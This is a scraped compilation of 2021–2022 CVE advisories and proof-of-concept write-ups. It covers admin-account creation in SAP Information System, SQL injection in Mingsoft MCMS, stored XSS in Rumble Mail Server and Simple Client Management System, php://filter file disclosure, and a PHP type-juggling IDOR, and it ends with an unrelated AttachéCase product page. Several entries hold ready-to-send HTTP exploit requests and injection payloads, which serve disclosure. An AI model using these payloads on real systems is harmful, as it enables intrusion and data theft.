A vulnerability was found in SAP Information System 1.0 which has been rated as critical. Affected by this issue is the file /SAP_Information_System/controllers/add_admin.php. An unauthenticated attacker is able to create a new admin account for the web application with a simple POST request. Exploit details were disclosed.

CVSS Meta Temp Score

CVSS is a standardized scoring system to determine possibilities of attacks. The Temp Score considers temporal factors like disclosure, exploit and countermeasures. The unique Meta Score calculates the average score of different sources to provide a normalized scoring system.

Current Exploit Price (≈)

Our analysts are monitoring exploit markets and are in contact with vulnerability brokers. The range indicates the observed or calculated exploit price to be seen on exploit markets. A good indicator to understand the monetary effort required for and the popularity of an attack.

CTI Interest Score

Our Cyber Threat Intelligence team is monitoring different web sites, mailing lists, exploit markets and social media networks. The CTI Interest Score identifies the interest of attackers and the security community for this specific vulnerability in real-time. A high score indicates an elevated risk to be targeted for this vulnerability.

6.6

$0-$5k

2.89

A vulnerability was found in SAP Information System 1.0. It has been rated as critical. Affected by this issue is an unknown code of the file _/SAP\_Information\_System/controllers/add\_admin.php_ of the component _POST Request Handler_. The manipulation with an unknown input leads to a weak authentication vulnerability. Using CWE to declare the problem leads to CWE-287. Impacted is confidentiality, integrity, and availability.

The weakness was published 04/06/2022. This vulnerability is handled as CVE-2022-1248. The exploitation is known to be easy. The attack may be launched remotely. No form of authentication is required for exploitation. Technical details as well as a exploit are known.

It is declared as proof-of-concept. The exploit is available at vuldb.com. The code used by the exploit is:

POST /SAP\_Information\_System/controllers/add\_admin.php HTTP/1.1
Host: target.com
Content-Length: 345
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI
Origin: http://target.com
Referer: http://target.com/SAP\_Information\_System/Dashboard/pages/Admin.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c
Connection: close

------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="username"

hacker
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="password"

P@ssw0rd!
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="user"

admin
------WebKitFormBoundaryYELEK8fMdX63l0iI--

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

**Productinfoedit**

**Name**

*   SAP Information System

**CPE 2.3infoedit**

*   🔒

**CPE 2.2infoedit**

*   🔒

**CVSSv3infoedit**

VulDB Meta Base Score: 7.3  
VulDB Meta Temp Score: 6.6

VulDB Base Score: 7.3  
VulDB Temp Score: 6.6  
VulDB Vector: 🔒  
VulDB Reliability: 🔍

**CVSSv2infoedit**

AV

AC

Au

C

I

A

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

Vector

Complexity

Authentication

Confidentiality

Integrity

Availability

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

VulDB Base Score: 🔒  
VulDB Temp Score: 🔒  
VulDB Reliability: 🔍

**Exploitinginfoedit**

Class: Weak authentication  
CWE: CWE-287  
ATT&CK: Unknown

Local: No  
Remote: Yes

Availability: 🔒  
Status: Proof-of-Concept  
Download: 🔒  
Price Prediction: 🔍  
Current Price Estimation: 🔒

0-Day

unlock

unlock

unlock

unlock

Today

unlock

unlock

unlock

unlock

**Threat Intelligenceinfoedit**

Interest: 🔍  
Active Actors: 🔍  
Active APT Groups: 🔍

**Countermeasuresinfoedit**

Recommended: no mitigation known  
Status: 🔍

0-Day Time: 🔒

**Timelineinfoedit**

04/06/2022 Advisory disclosed  
04/06/2022 +0 days VulDB entry created  
04/06/2022 +0 days VulDB last update

**Sourcesinfoedit**

Status: Not defined

CVE: CVE-2022-1248 (🔒)  
scip Labs: https://www.scip.ch/en/?labs.20161013

**Entryinfoedit**

Created: 04/06/2022 05:01  
Updated: 04/06/2022 05:10  
Changes: (1) exploit\_sourcecode  
Complete: 🔍  
Submitter: mrempy

**Want to stay up to date on a daily basis?**

Enable the mail alert feature now!

CVE-2022-1248: SAP Information System POST Request add_admin.php improper authentication

Mingsoft MCMS v5.2.7 was discovered to contain a SQL injection vulnerability via /cms/content/list.

**一、 cms简介**

Mingsoft MCMS是基于SpringBoot 2架构，前端基于vue、element ui。每月28定期更新版本，为开发者提供上百套免费模板,同时提供适用的插件（文章、商城、微信、论坛、会员、评论、支付、积分、工作流、任务调度等...），一套简单好用的开源系统、一整套优质的开源生态内容体系。铭飞的使命就是降低开发成本提高开发效率，提供全方位的企业级开发解决方案

**二、 漏洞简介**

Mingsoft MCMS v5.2.7版本存在SQL注入，该漏洞位于路由/cms/content/list，参数categoryId存在SQL注入，缺少对于SQL数据的过滤和转义

**三、 影响范围**

Mingsoft MCMS <=5.2.7  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002432_d85d9547_2159388.png "屏幕截图.png")

**四、 漏洞分析**

位于net/mingsoft/cms/action/ContentAction.java，找到有一处路由\*\*/cms/content/list\*\*代码如下，对第128行IContentBiz.query()进行分析  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002519_0609d5fb_2159388.png "屏幕截图.png")  
我们先看一下IContentBiz接口，IContentBiz接口继承了IBaseBiz接口，那么子类扩展父类之后就可以获得父类IBaseBiz的属性和方法  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002543_33cd0ce0_2159388.png "屏幕截图.png")  
接着，我们知道IBaseBiz是一个接口定义了query方法  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002609_d8960395_2159388.png "屏幕截图.png")  
BaseBizImpl实现类实现了IBaseBiz接口，我们知道一个类实现了一个或多个接口之后，这个类必须完全实现这些接口里所定义的全部抽象方法（也就是重写这些抽象方法），实现接口与继承父类相似，一样可以获得所实现接口里定义的常量和方法，可以看到IBaseBiz已经重写了query方法  
![](https://images.gitee.com/uploads/images/2022/0303/002636_f2aede33_2159388.png "屏幕截图.png")  
BaseBizImpl实现类中重写了父类的query方法  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002727_b1830bdf_2159388.png "屏幕截图.png")  
我们知道IContentDao.java,IContentDaoimpl.java和McmsAction.java，分别对应映射的对象，对象的实现类和前端控制器，位于net/mingsoft/cms/dao/IContentDao.java中，IContentDao接口继承了IBaseDao接口，那么IContentDao接口就获得了IBaseDao接口的所有方法  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002753_59f834ae_2159388.png "屏幕截图.png")  
从上图可以看到映射文件中的namespace="net.mingsoft.cms.dao.IContentDao"所绑定的是IContentDao接口，即面向接口编程，mybatis中，  
当你的namespace绑定接口后，可以不用写接口实现类，mybatis会通过该绑定自动帮你找到对应要执行的SQL语句，我们知道接口中的方法与映射文件中的SQL语句的ID一一对应，所以我们直接查找IContentDao.xml中SQL语句的id为query，下图可以看到成功定位到第212行。  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/014728_66858f54_2159388.png "屏幕截图.png")  
分析id等于query的SQL语句，第221行  
`select id FROM cms_category where find_in_set('${categoryId}',CATEGORY_PARENT_IDS)>0`  
我们知道mybatis框架find\_in\_set后是不能用#{}，使用${}是拼接,底层调用的是Statement对象，直接将categoryId的属性值拼接进SQL语句，没有任何的过滤，参数categoryId存在SQL注入

**五、 证明**

不需要cookie凭证，直接构造poc即可利用：

    POST /cms/content/list HTTP/1.1
    Host:172.20.10.3:8081
    Connection: close
    Accept: application/json, text/plain, */*
    Origin: http://172.20.10.3:8081
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
    Referer: http://172.20.10.3:8081/ms/main.do?
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 197
    
    categoryId=2' AND GTID_SUBSET(CONCAT(0x716a717871,(SELECT MID((IFNULL(CAST(grantee AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT 78,1),0x716a627a71),3762) AND 'EIVI'='EIVI
    

本地搭建环境验证，在路由/cms/content/list下,参数categoryId存在SQL注入，如下图所示通过SQL注入成功获取到用户信息root@localhost  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/021700_85cffd42_2159388.png "屏幕截图.png")

**六、 加固建议**

1、正确用法为使用foreach，对like、find\_in\_set、in和order语句需要使用#  
2、增加SQL filter过滤器，对危险参数进行严格校验及过滤。

CVE-2022-26585: Mingsoft MCMS v5.2.7 SQL注入 · Issue #I4W1S9 · 铭飞/MCMS - Gitee.com

A path traversal vulnerability was identified in GitHub Enterprise Server management console that allowed the bypass of CSRF protections. This could potentially lead to privilege escalation. To exploit this vulnerability, an attacker would need to target a user that was actively logged into the management console. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.5 and was fixed in versions 3.1.19, 3.2.11, 3.3.6, 3.4.1. This vulnerability was reported via the GitHub Bug Bounty program.

CVE-2022-23732: Release notes - GitHub Docs

Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the servername parameter.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Exploit:
    POST /settings:save HTTP/1.1
    Host: 127.0.0.1:2580
    Connection: keep-alive
    Content-Length: 343
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46YWRtaW4=
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1:2580
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1:2580/settings
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    
    save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
    HTTP/1.1 302 Moved
    Location: /settings:save
    
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on <script>alert(xss.com)</script><br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
      <h1>Server settings</h1>
    
    Saving config/rumble.conf
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

CVE-2021-43461: Offensive Security’s Exploit Database Archive

An unrestricted file upload at /public/admin/index.php?add_product of Ecommerce-Website v1.1.0 allows attackers to upload a webshell via the Product Image component.

CVE-2022-27435: GitHub - D4rkP0w4r/Full-Ecommece-Website-Add_Product-Unrestricted-File-Upload-RCE-POC

Simple Bakery Shop Management System v1.0 contains a file disclosure via /bsms/?page=products.

Permalink

**Simple Bakery Shop Management System File Disclosure**

*   `Note` => login to admin

**Exploit**

*   Exploit with Burp Suite

http://192.168.1.101:8080/bsms/?page\=products

![image](https://user-images.githubusercontent.com/79050415/160247964-7c8adf9f-fb75-4754-a47d-0b6a31c553a1.png)

*   Use Burp Suite capture request and payload => `Send` ![image](https://user-images.githubusercontent.com/79050415/160248025-19c24820-79ae-4522-93dc-f06f3ce3ca90.png)
*   Then decode `Base64`

PD9waHANCg0KQ2xhc3MgREJDb25uZWN0aW9uew0KICAgIHByb3RlY3RlZCAkZGI7DQogICAgZnVuY3Rpb24gX19jb25zdHJ1Y3QoKXsNCiAgICAgICAgJHRoaXMtPmRiPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywnJywnYnNtc19kYicpOw0KICAgICAgICBpZighJHRoaXMtPmRiKXsNCiAgICAgICAgICAgIGRpZSgnRGF0YWJhc2UgQ29ubmVjdGlvbiBGYWlsZXMuIEVycm9yOiAnLiR0aGlzLT5kYi0+ZXJyb3IpOw0KICAgICAgICB9DQoNCiAgICB9DQogICAgZnVuY3Rpb24gZGJfY29ubmVjdCgpew0KICAgICAgICByZXR1cm4gJHRoaXMtPmRiOw0KICAgIH0NCiAgICBmdW5jdGlvbiBfX2Rlc3RydWN0KCl7DQogICAgICAgICAkdGhpcy0+ZGItPmNsb3NlKCk7DQogICAgfQ0KfQ0KDQpmdW5jdGlvbiBmb3JtYXRfbnVtKCRudW1iZXIgPSAnJywkZGVjaW1hbD0nJyl7DQogICAgaWYoaXNfbnVtZXJpYygkbnVtYmVyKSl7DQogICAgICAgICRleCA9IGV4cGxvZGUoIi4iLCRudW1iZXIpOw0KICAgICAgICAkZGVjX2xlbiA9IGlzc2V0KCRleFsxXSkgPyBzdHJsZW4oJGV4WzFdKSA6IDA7DQogICAgICAgIGlmKCFlbXB0eSgkZGVjaW1hbCkgfHwgaXNfbnVtZXJpYygkZGVjaW1hbCkpew0KICAgICAgICAgICAgcmV0dXJuIG51bWJlcl9mb3JtYXQoJG51bWJlciwkZGVjaW1hbCk7DQogICAgICAgIH1lbHNlew0KICAgICAgICAgICAgcmV0dXJuIG51bWJlcl9mb3JtYXQoJG51bWJlciwkZGVjX2xlbik7DQogICAgICAgIH0NCiAgICB9ZWxzZXsNCiAgICAgICAgcmV0dXJuICdJbnZhbGlkIGlucHV0Lic7DQogICAgfQ0KfQ0KDQokZGIgPSBuZXcgREJDb25uZWN0aW9uKCk7DQokY29ubiA9ICRkYi0+ZGJfY29ubmVjdCgpOw\==

![image](https://user-images.githubusercontent.com/79050415/160248053-c84ba212-195d-42f3-8bca-bf84c485f810.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/160248200-f24761ec-5dbb-4f04-94ae-b251b4127dbf.png)

*   `Request`

GET /bsms/?page\=php://filter/convert.base64\-encode/resource\=DBConnection HTTP/1.1
Host: 192.168.1.101:8080
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.1.101:8080/bsms/
Accept\-Encoding: gzip, deflate
Accept\-Language: en\-US,en;q\=0.9
Cookie: PHPSESSID\=0722dtqnb1dgvuono8uubajcae
Connection: close

CVE-2022-28063: CVEs/POC.md at main · D4rkP0w4r/CVEs

Car Rental System v1.0 contains an arbitrary file upload vulnerability via the Add Car component which allows attackers to upload a webshell and execute arbitrary code.

CVE-2022-28062: CVEs/POC.md at main · D4rkP0w4r/CVEs

Multiple Cross Site Scripting (XSS) vulnerabilities exist in Ssourcecodester Simple Client Management System v1 via (1) Add new Client and (2) Add new invoice.

\# Exploit Title: Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) # Exploit Author: Sentinal920 # Date: 5-11-2021 (5th Nov 2021) # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: client,invoice # Vulnerable Parameters: "lastname", "remarks" Technical description: A stored XSS vulnerability exists in the Simple Client Management System. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/cms/admin/?page=client 2) Click on add new client 3) Insert your payload in the "lastname" parameter or the "description" parameter 4) Click save Proof of concept (Poc): The following payload will allow you to run the javascript - 1) XSS POC in Add New Client POST /cms/classes/Master.php?f=save\_client HTTP/1.1 Host: localhost Content-Length: 1026 sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" Accept: application/json, text/javascript, \*/\*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBW1SfSFiXMKK7Nt X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/?page=client/manage\_client Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn Connection: close ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="lastname" ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="firstname" anything ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="middlename" anything ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="dob" 2021-11-03 ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="contact" xxxxxxxxxx ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="address" xxxxxx ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="email" xxxx@xxx.com ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="avatar"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt-- 2) XSS POC in Add New Invoice POST /cms/classes/Master.php?f=save\_invoice HTTP/1.1 Host: localhost Content-Length: 1032 sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" Accept: application/json, text/javascript, \*/\*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEk0iOWhhoA0lApXo X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/?page=invoice/manage\_invoice Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn Connection: close ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="id" ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="client\_id" 1 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="service\_id\[\]" 1 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="price\[\]" 250 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="discount\_perc" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="discount" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="tax\_perc" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="tax" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="total\_amount" 250 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="remarks" ------WebKitFormBoundaryEk0iOWhhoA0lApXo--

CVE-2021-43505

Loose comparison causes IDOR on multiple endpoints in GitHub repository livehelperchat/livehelperchat prior to 3.96.

**Description**

Live Helper Chat is vulnerable to Type Juggling on the `requestPayload['hash']`. The application uses a Loose Comparison to check if the user-controlled parameter is equal to an hash, this check is vulnerable because it's possible to pass other Data Types via JSON that causes the `if` condition to be `True`. This occurs on multiple endpoints.

**Proof of Concept**

For the PoC, the vulnerability resides on https://github.com/LiveHelperChat/livehelperchat/blob/master/lhc\_web/modules/lhwidgetrestapi/fetchmessage.php#L19

        if ($chat instanceof erLhcoreClassModelChat && $chat->hash == $requestPayload['hash'])
    

1.  **Request**

    POST /eng/widgetrestapi/fetchmessages HTTP/1.1
    Host: demo.livehelperchat.com
    Cookie: lhc_vid=eb9bc0c044919538c5b1
    Content-Length: 62
    Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="99"
    Accept: application/json, text/plain, */*
    Content-Type: application/x-www-form-urlencoded
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
    Sec-Ch-Ua-Platform: "macOS"
    Origin: https://demo.livehelperchat.com
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.livehelperchat.com/
    Accept-Encoding: gzip, deflate
    Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
    Connection: close
    
    {"chat_id":2,"hash":true,"lmgsid":1,"theme":1,"new_chat":true}
    

Note the `"hash":true`, this will make the `if` always return `True`.

The loose comparison can be solved by using a type safe check `===` or updating PHP to `8 <=`.

I've attached more occurrences of the same vulnerability: modules/lhwidgetrestapi/fetchmessage.php modules/lhwidgetrestapi/fetchmessages.php modules/lhwidgetrestapi/getmessagesnippet.php modules/lhwidgetrestapi/initchat.php modules/lhwidgetrestapi/uisettings.php

**Impact**

It's possible to bypass multiple checks. An attacker could access private information of other users.

**Occurrences**

CVE-2022-1176: Loose comparison causes IDOR on multiple endpoints in livehelperchat

Untrusted search path vulnerability in AttacheCase ver.3.6.1.0 and earlier allows an attacker to gain privileges and execute arbitrary code via a Trojan horse DLL in an unspecified directory.

![AttachéCase icon](https://hibara.org/software/attachecase/img/main_icon_128x128.png)

**AttachéCase ( Current Version )****Windows10, 11 / macOS**

![Windows 10 logo](https://hibara.org/software/attachecase/img/Windows_10_Logo.svg) **\- Update**   \* NET Framework 4.6 later

![Apple logo](https://hibara.org/software/attachecase/img/apple-logo.svg) **\-**   \* macOS 10.14 (macOS Mojave) later

> "AttachéCase4" is a powerful file/folder encryption software that uses the world's standard encryption algorithm, while focusing on simplicity and ease of use for daily use.

> **Important Notice（2022/03/30）**
> 
> A vulnerability in loading DLL was discovered in "AttacheCase4" for Windows. Placing a maliciously modified "dwmapi.dll" in the directory containing the executable file (AttacheCase.exe) may allow arbitrary code to be executed.
> 
> This vulnerability have been confirmed in **ver. 4.0.2.7 or earlier**. If you are using these versions of "AttacheCase4", please update to the latest version as soon as possible.
> 
> More information on this vulnerability can be found at the following page.  
> https://hibara.org/software/attachecase/vulnerability/
> 
> JVN#10140834  
> **AttacheCase may insecurely load Dynamic Link Libraries**  
> https://jvn.jp/jp/JVN10140834/
> 
> By countermeasuring of this vulnerability, the previous vulnerability in the older version of the " AttacheCase#3 " is also fixed.
> 
> If you are using this version, please update to the latest version as soon as possible.

![Main Window](https://hibara.org/software/attachecase/img/main_window_en.png)

スポンサー・リンク

**Introduction**

**Encryption is just three steps**

Encryption is just three steps. You can easily encrypt files by simply dragging and dropping them, or if you drag and drop the entire folder, it will create one encrypted file (pack the entire folder).

![ファイルの暗号化はわずか３ステップ](https://hibara.org/software/attachecase/img/3-steps-horizontal_en.png)

In addition, the data will be compressed during the encryption process, making it compact in size.

Decrypting is also as easy as dragging and dropping, or double-clicking and entering the password to restore the original files and folders.

**Output in self-executable format**

The encrypted file can also be output as an executable (\*.exe) file, so it can be passed to someone who does not have an AttachéCase and can be decrypted.

![Output in self-executable format](https://hibara.org/software/attachecase/img/exeout_en.png)

The Mac version cannot output in self-executable format, but it can decrypt executable files (\*.exe) generated by the Windows version.

**Supports both Windows and macOS**

Enables data exchange on Windows and macOS.

![AttcheCase for Mac](https://hibara.org/software/attachecase/img/attachecase_mac.png)

At present, the macOS version is inferior to the Windows version in terms of functionality, but as described in the roadmap below, I plan to start supporting both versions in earnest from around .NET6.

**Public key cryptography**

From ver.4, public key cryptography (RSA) is also supported. By exchanging public and private keys, it is no longer necessary to exchange ZIP passwords, making it possible to exchange data more securely.

![Sending the public key](https://hibara.org/software/attachecase/img/public_key_en.png)

![Decrypting with a private key](https://hibara.org/software/attachecase/img/private_key_en.png)

![RSA Cryption](https://hibara.org/software/attachecase/img/rsa_crypt_en.png)

**Cryptographic algorithms are global standards**

The encryption algorithm is based on the Advanced Encryption Standard (AES), the next-generation encryption standard chosen by the U.S. Government's National Institute of Standards and Technology (NIST) in October 2000. Also, the encryption mode used is CBC mode.

![CBC暗号化モード](https://hibara.org/software/attachecase/img/cbc-mode_en.png)

**Key derivation according to RFC2898**

![Key derivation according to RFC2898](https://hibara.org/software/attachecase/img/rfc2898derive_bytes_en.png)

Based on "PKCS #5: Password-Based Cryptography Specification Version 2.0" by RFC2898, the derived key and initialization vector after 1,000 iterations of password-based key derivation mixed with random numbers as salt are output one after another, and each is used as the key and initialization vector for encryption.

**New data format (Current version)**

Starting from ver.4, a new data format has been introduced, which enables more efficient encryption and decryption based on the know-how accumulated in the development up to ver.3. Note that ver.4 can decrypt data of ver.3 and 2, but ver.3 and 2 cannot decrypt data of ver.4. For details on data formats, please refer to " here ".

The old version is below.

**Development Roadmap**

A macOS version is also available, but it has limited functionality compared to the Windows version. .NET library used in application will be upgraded in the future, making it a cross-platform application completely that supports both Windows and macOS. Specifically, I will do this over the period from Nov 2021 onward.

Due to the delay in development by Microsoft, it is likely that full cross-platform with Windows and macOS will not be available until the second quarter of 2022 or later . Depending on the development status, it may be possible to release it as a beta version before the end of this year, but the schedule is uncertain.

![Development Roadmap](https://hibara.org/software/attachecase/img/roadmap_en.png)

After that, we will support .NET7, .NET8 according to the latest libraries released by Microsoft.

**Starting from ver.4, commercial use will be charged.**

**Windows**

I also set the "trial period" as one month, but there is no limit to how long you can continue using the app.

The price is **550 yen (tax included) per 1 user**.

Note that

*   For home and personal use
*   Students and educational institutions

can use it free of charge as a free license version.

You have free personal use, but if you would like to support us in the form of "support" or "donation", you are welcome to pay so. In that case, you will be issued a registration code, just like a commercial user.

As a result, support for the previous ver. 3 and 2 will be discontinued (Complete termination by April 2022). However, the previous versions will continue to be available free of charge for both personal and commercial use.

**macOS**

As for the macOS version, anyone (regardless of personal or commercial use) can use it free of charge.

However, that is only for downloads from this website, and any future downloads handled by the App Store will be paid for (whether for personal or commercial use).

The reason why downloads from this website, including the macOS version, are free of charge, while downloads from the App Store are paid for, is explained in the next section.

**Why commercial use is now paid for?**

There are many reasons for this, including the cost of managing and maintaining websites, the cost of continuing software development, especially the cost of "code signing certificates" that are added to executable files to prove that they are safe on Windows and can be installed without warning messages, and, for macOS, the Apple Developer registration fee etc. has become very difficult to cover with the decrease in advertising revenue.

I get a lot of emails about bugs and complaints, but other than that, I don't know what kind of people are using it, and to be honest, I'm loss of motivation.

The source code is released under the GPLv3 license (the macOS version is not open to the public), so there are no restrictions on using it as a stray build. You will only be charged for downloading the software from this official website or the App Store (\* Currently under review). In other words, please think of it as the cost of the distributed product, including development and maintenance costs, code signing certificate fees, etc.

スポンサー・リンク

**Download**

**Ver.4**

![Windows10 logo](https://hibara.org/software/attachecase/img/Windows_10_Logo.svg)

\* Windows10, 11 / NET Framework 4.6 later

![Apple logo](https://hibara.org/software/attachecase/img/apple-logo.svg)

\* macOS 10.14 (macOS Mojave) later

